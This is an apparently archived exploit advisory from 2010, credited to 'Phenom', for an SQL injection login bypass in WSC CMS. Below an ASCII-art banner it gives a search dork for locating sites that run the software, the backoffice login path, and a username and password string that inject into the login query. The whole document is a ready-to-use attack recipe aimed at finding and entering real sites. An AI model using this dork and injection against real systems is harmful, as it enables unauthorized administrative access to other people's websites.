[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WSC CMS (Bypass) SQL Injection Vulnerability
# Published : 2010-02-19
# Author : Phenom
# Previous Title : SQL injection vulnerability in Amelia CMS
# Next Title : Trixbox PhonecDirectory.php SQL Injection


------------------------------------------------------
------------------------------------------------------

 _____  _                                
|  __ | |                               
| |__) | |__   ___ _ __   ___  _ __ ___  
|  ___/| '_  / _  '_  / _/| '_ ` _               
| |    | | | |  __/ | | | (_) | | | | | |             
|_|    |_| |_|___|_| |_|/__/|_| |_| |_|             

                                                      
------------------------------------------------------
------------------------------------------------------

############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
#       Author : Phenom
#       
#       mail : sys.phenom.sys[at]gmail[dot]com
#
#       Dork : Realizzato con WSC CMS  by Dynamicsoft 
#
################################################################################################

####### Exploit ################################################################################
#
#     1- http://server/public/backoffice 
# 
#     2- login with "admin" as user name and 'or' as password 
#
################################################################################################